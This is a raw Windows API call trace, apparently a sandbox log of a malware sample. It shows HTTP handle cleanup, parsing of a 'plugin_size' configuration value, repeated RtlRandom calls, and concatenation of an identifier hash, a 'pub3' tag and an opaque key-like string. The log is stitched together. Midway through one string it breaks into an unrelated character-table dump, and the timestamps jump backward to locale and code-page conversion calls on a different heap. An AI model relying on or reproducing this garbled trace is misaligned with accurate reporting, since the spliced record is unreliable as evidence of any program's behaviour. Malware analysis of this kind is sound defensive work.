[0218.102] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211ca0) returned 1 [0218.102] WinHttpCloseHandle (hInternet=0x84fb6e0) returned 1 [0218.102] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92107a0) returned 0x68 [0218.103] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92107a0) returned 1 [0218.103] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210780) returned 0x12 [0218.103] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210780) returned 1 [0218.103] WinHttpCloseHandle (hInternet=0x4a86fb0) returned 1 [0218.103] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211b20) returned 0x10c [0218.104] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211b20) returned 1 [0218.104] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211890) returned 0x118 [0218.104] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211890) returned 1 [0218.104] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92119b0) returned 0x167 [0218.105] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92119b0) returned 1 [0218.105] lstrlenA (lpString="ä\x071|:|plugin_size=0") returned 19 [0218.105] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x15) returned 0x9210780 [0218.105] lstrlenA (lpString="1|:|plugin_size=0") returned 17 [0218.105] lstrlenA (lpString="plugin_size") returned 11 [0218.105] atoi (_Str="0") returned 0 [0218.105] lstrlenA (lpString="1|:|plugin_size=0") returned 17 [0218.105] lstrlenA (lpString="|:|") returned 3 [0218.105] MapViewOfFile (hFileMappingObject=0x223c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x90d0000 [0218.116] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0218.116] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x90d0000) returned 0x0 [0218.146] atoi (_Str="1") returned 1 [0218.146] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe02529c4 [0218.147] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x6c) returned 0x92107a0 [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3fbb43ee [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x702f28e2 [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe00cf13e [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4dee7471 [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc1b96baf [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xed57f134 [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1f63549e [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x17213cc5 [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4c10726f [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd4214cc9 [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7b147792 [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xca60d80f [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5fbd19cc [0218.147] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6d722f27 [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf2b3c944 [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3923f926 [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf9e8545 [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4ad286be [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xef0cd00c [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7c9a412b [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7f38ba [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x52b46c7c [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x182946f8 [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8fe78515 [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2cd0d0f5 [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9547466d [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbeedd7b6 [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3441f671 [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3558d8e9 [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe6d5f4ff [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdbf5d375 [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa804dc3d [0218.148] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfced0b40 [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9077233f [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9f0f2df5 [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x61253a8e [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa1f1517d [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1ea7afc9 [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcd9f5dab [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x23639e65 [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6cf2d67e [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x14ae0ce [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xabee04fb [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x482b163b [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x46777216 [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5072654d [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6348d3f9 [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x13aa71a6 [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x21a4b815 [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5c8bba95 [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3935adc8 [0218.149] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2d18c673 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xebb8f740 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9c6d8fad [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcf06827 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1a017c88 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x75e1dc77 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb0311220 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8032ce9f [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdad1ae8d [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x91b12114 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x724292ed [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3ade1c8 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x43dc803f [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x89b2a168 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd7eddeb9 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa8360c7a [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3699e440 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc1fa3 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb4981da9 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcbbd1847 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4b8b04d4 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb5af0191 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xaa06f479 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x35e2bffa [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x788084ce [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa534f2e8 [0218.150] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2dd3a56e [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x77870a5b [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x96272cfa [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x53fdee3f [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe902d849 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xda9c26fe [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4568bf7a [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4080b67d [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x44cb9f0d [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x57b59e57 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd546e9f5 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf8312486 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x89e2cab9 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xef0984e4 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xab964e25 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x67576786 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5327462 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1362b3dd [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6a86672 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x71a811c3 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5317b2a1 [0218.151] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8038ede [0218.151] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0xbb) returned 0x9211890 [0218.151] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0218.152] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0218.152] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0218.152] lstrcatA (in: lpString1="", lpString2="]qkpl_-L2ZQpQ*!%lG',uMG`l*k,b*2zn8$Y2Dbp6sV6)HVT>QT2aemaHYM99n^vGOXzvwc=!m^+lCZ9\"n&Q&(WuanS]GVyO=Z*2zn8$Y2Dbp6sV6)HVT>QT2aemaHYM99n^vGOXzvwc=!m^+lCZ9\"n&Q&(WuanS]GVyO=Z*2zn8$Y2Dbp6sV6)HVT>QT2aemaHYM99n^vGOXzvwc=!m^+lCZ9\"n&Q&(WuanS]GVyO=Z?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0208.876] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpCharType=0x19fc28 | out: lpCharType=0x19fc28) returned 1 [0208.876] HeapValidate (hHeap=0x930000, dwFlags=0x0, lpMem=0x932f20) returned 1 [0208.876] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0x932f20 | out: hHeap=0x930000) returned 1 [0208.876] GetLastError () returned 0x0 [0208.876] SetLastError (dwErrCode=0x0) [0208.876] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0208.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f920, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0208.878] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x22c) returned 0x932f20 [0208.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f920, cbMultiByte=256, lpWideCharStr=0x932f48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0208.878] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0208.878] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x22c) returned 0x933158 [0208.878] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x933180, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0208.878] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchWideChar=256, lpMultiByteStr=0x19fb28, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0208.879] HeapValidate (hHeap=0x930000, dwFlags=0x0, lpMem=0x933158) returned 1 [0208.879] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0x933158 | out: hHeap=0x930000) returned 1 [0208.879] HeapValidate (hHeap=0x930000, dwFlags=0x0, lpMem=0x932f20) returned 1 [0208.879] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0x932f20 | out: hHeap=0x930000) returned 1 [0208.879] GetLastError () returned 0x0 [0208.880] SetLastError (dwErrCode=0x0) [0208.880] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f920, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0208.880] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x22c) returned 0x932f20 [0208.880] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f920, cbMultiByte=256, lpWideCharStr=0x932f48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0208.880] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0208.880] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x22c) returned 0x933158 [0208.880] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x933180, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽") returned 256 [0208.880] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽", cchWideChar=256, lpMultiByteStr=0x19fa28, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f 